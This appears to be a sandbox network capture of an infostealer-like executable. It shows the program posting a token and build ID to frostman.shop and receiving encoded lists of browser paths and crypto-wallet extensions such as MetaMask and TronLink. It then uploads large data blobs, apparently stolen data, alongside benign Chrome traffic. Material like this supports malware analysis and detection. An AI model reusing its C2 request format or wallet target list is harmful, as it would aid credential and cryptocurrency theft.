R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.7  49709        116.203.12.114  443               6960  C:\Users\user\Desktop\pjthjsdjgjrtavv.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-20 06:31:15 UTC  325                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----G47GDB16FUSRIMOPZCBI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:15 UTC  331                OUT        Data Ascii:
------G47GDB16FUSRIMOPZCBI
Content-Disposition: form-data; name="token"

4971dbaed128343936d3c1f60719f3d9
------G47GDB16FUSRIMOPZCBI
Content-Disposition: form-data; name="build_id"

2029121d70cd0f691aa23f374badb32f
------G47GDB16FUSRIMOPZCBI
Cont
2024-12-20 06:31:16 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:16 UTC  5837               IN         Data Ascii:
16c0
TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.7  49715        116.203.12.114  443               6960  C:\Users\user\Desktop\pjthjsdjgjrtavv.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-20 06:31:18 UTC  325                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----OZ5XT2689RQQIMG479H4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:18 UTC  332                OUT        Data Ascii:
------OZ5XT2689RQQIMG479H4
Content-Disposition: form-data; name="token"

4971dbaed128343936d3c1f60719f3d9
------OZ5XT2689RQQIMG479H4
Content-Disposition: form-data; name="build_id"

2029121d70cd0f691aa23f374badb32f
------OZ5XT2689RQQIMG479H4
Cont
2024-12-20 06:31:18 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:18 UTC  119                IN         Data Ascii:
6c
TWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.7  49721        116.203.12.114  443               6960  C:\Users\user\Desktop\pjthjsdjgjrtavv.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-20 06:31:20 UTC  326                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----8Q9RQQQQ1DJMYU379R16
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 6893
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:20 UTC  6893               OUT        Data Ascii:
------8Q9RQQQQ1DJMYU379R16
Content-Disposition: form-data; name="token"

4971dbaed128343936d3c1f60719f3d9
------8Q9RQQQQ1DJMYU379R16
Content-Disposition: form-data; name="build_id"

2029121d70cd0f691aa23f374badb32f
------8Q9RQQQQ1DJMYU379R16
Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:21 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49723 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:21 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GLX4O8QQ1DJE3EC2N7Q9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:21 UTC | 489 | OUT | Data Ascii: ------GLX4O8QQ1DJE3EC2N7Q9Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------GLX4O8QQ1DJE3EC2N7Q9Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------GLX4O8QQ1DJE3EC2N7Q9Cont
2024-12-20 06:31:22 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:22 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49740 | 172.217.21.36 | 443 | 7680 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:24 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49741 | 172.217.21.36 | 443 | 7680 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:24 UTC | 595 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIkqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-20 06:31:25 UTC | 1266 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 06:31:24 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-8HFge77VN-bPv9a8qugYig' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-20 06:31:25 UTC | 124 | IN | Data Ascii: 335)]}'["",["max kepler phillies","nvidia rtx 5090","tiktok banned","renegade raider in fortnite","denver nuggets portlan
2024-12-20 06:31:25 UTC | 704 | IN | Data Ascii: d trail blazers","librela for dogs","nyt strands hints december 19","weather forecast snow storm minnesota"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","googl
2024-12-20 06:31:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49739 | 172.217.21.36 | 443 | 7680 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:24 UTC | 498 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIkqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-12-20 06:31:25 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:24 GMT
                                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49738 | 172.217.21.36 | 443 | 7680 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:24 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-12-20 06:31:25 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:24 GMT
                                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49765 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:29 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 505
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:29 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------2DTJEUS2DTRQQIMOZMYMCont
2024-12-20 06:31:30 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:30 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49770 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:30 UTC | 328 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----ZU3EUA1VAI5FUA1DJ589
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 213453
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 55 33 45 55 41 31 56 41 49 35 46 55 41 31 44 4a 35 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 5a 55 33 45 55 41 31 56 41 49 35 46 55 41 31 44 4a 35 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 5a 55 33 45 55 41 31 56 41 49 35 46 55 41 31 44 4a 35 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------ZU3EUA1VAI5FUA1DJ589Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------ZU3EUA1VAI5FUA1DJ589Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------ZU3EUA1VAI5FUA1DJ589Cont
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-20 06:31:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49776 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:32 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFUAIWTJM7GVAAIM7GLN
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:34 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:34 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49781 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:34 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3790H479RI5F3EKNYUK6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-20 06:31:36 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 49785 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:35 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----YUAI5X4W47GV3EUS0HDT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
